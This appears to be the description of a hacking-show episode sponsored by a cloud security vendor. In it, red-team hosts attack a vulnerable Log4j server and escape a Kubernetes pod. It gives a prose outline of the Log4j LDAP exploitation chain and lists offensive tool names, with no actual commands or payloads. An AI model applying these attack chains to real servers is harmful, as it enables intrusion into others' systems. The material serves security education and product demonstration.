Reviews
User Scrore
Rate This
Descriptions:
First PWN at 27:30
Second PWN at 1:03:23
COUNTdown:
https://www.instagram.com/dariazaritskaya/
===== OUR SPONSORS ===================
https://SPYDERbat.com
Cloud Native Runtime Security
====== Get your HACKERmask on ========
Get your HACKERmask on:
https://discord.gg/BZ9jjHAypP
======================================
Hosts:
Craig Ellrod, https://www.linkedin.com/in/craigellrod/ … §ƱЯfↁ4wg … “Ꝅ1₪ꞡƿꟺ₪ of the HACKERverse (ʰᵛ 0ˣ0000)”
Michael Foster, https://www.linkedin.com/in/mfosterche/ … ƕ4Яↁß4££$ (ʰᵛ 0ˣ0015)
Steve Giguere, https://www.linkedin.com/in/stevegiguere/ … $ꝄƱ11$Ꝅ4ꝉ3Я (ʰᵛ 0ˣ0013)
Red Team:
Jame Beers, https://www.linkedin.com/in/james-beers-7223b31b1/ … ₪3ɱ0Ж0 (ʰᵛ 0ˣ0007)
Tyler Belmonte, https://www.linkedin.com/in/tylerbelmonte/ … $ꟺ1$$¢ƕ33$€ (ʰᵛ 0ˣ000D)
Michael Schlosser, https://www.linkedin.com/in/michael-m-schlosser-0gr3/ … 0ꞡЯ3 (ʰᵛ 0ˣ0009)
Blue Team:
Brent Haub, https://www.linkedin.com/in/brenthaub/ … ¢ƕ1€ꟻЯƱ₪₪1₪ꞡꝉ4Яꞡ3ꝉ
Seth Goldhammer, https://www.linkedin.com/in/sethgoldhammer/ … $0¢4113ↁ$3ꝉƕ
Arena 1 – Log4j
TIME TO PWN: 11:19 minutes (plus a few, cus Craig forgot to start the timer)
Attack:
So, this is how Log4j vulnerability can be exploited:
An attacker finds a server with a vulnerable Log4j version.
They will send the targeted server a get request with their malicious LDAP server’s link.
The targeted server, instead of verifying the request, will directly connect to this LDAP server.
The attackers will now send the targeted server with an LDAP server response containing malicious code. Due to Log4j’s vulnerability, which allows receiving the code and executing it without verification, the hacker can leverage this weakness to break into the target server and exploit connected systems, networks, and devices.
Tools/commands:
nmap
nikto
curl
fuser
python
nc
stty
fg
ssh
lenpeas
docker enumeration
ldap
web app
dirbuster
burpsuite
wappalyzer
Defend:
Spyderbat
Arena 2 – Kubernetes
TIME TO PWN: 12:59 minutes
Attack:
The attacker has found a K8s port that has an opened dev shell active into a pod in the K8s cluster. They are going to take advantage of this and try to escilate the attack to take over the root machine. As this attacker traverses through the cluster and pods, Spyderbat will be tracking them allowing the developers to properly fix the issues before someone else can attack their infrastructure.
Tools/commands:
capsh
mount
ls
read
find
Defend:
Spyderbat
=====
#LOG4j #KUBERNETES #K8S
#CLOUDsecurity
#CLOUDnative
#SPYDERbat
#CYBERsecurity
#INFOsec
#HACKERculture
#HACKERverse
#HACKERfiles
#HACKERmask
#DEFcon
#KiKrr
#METAverse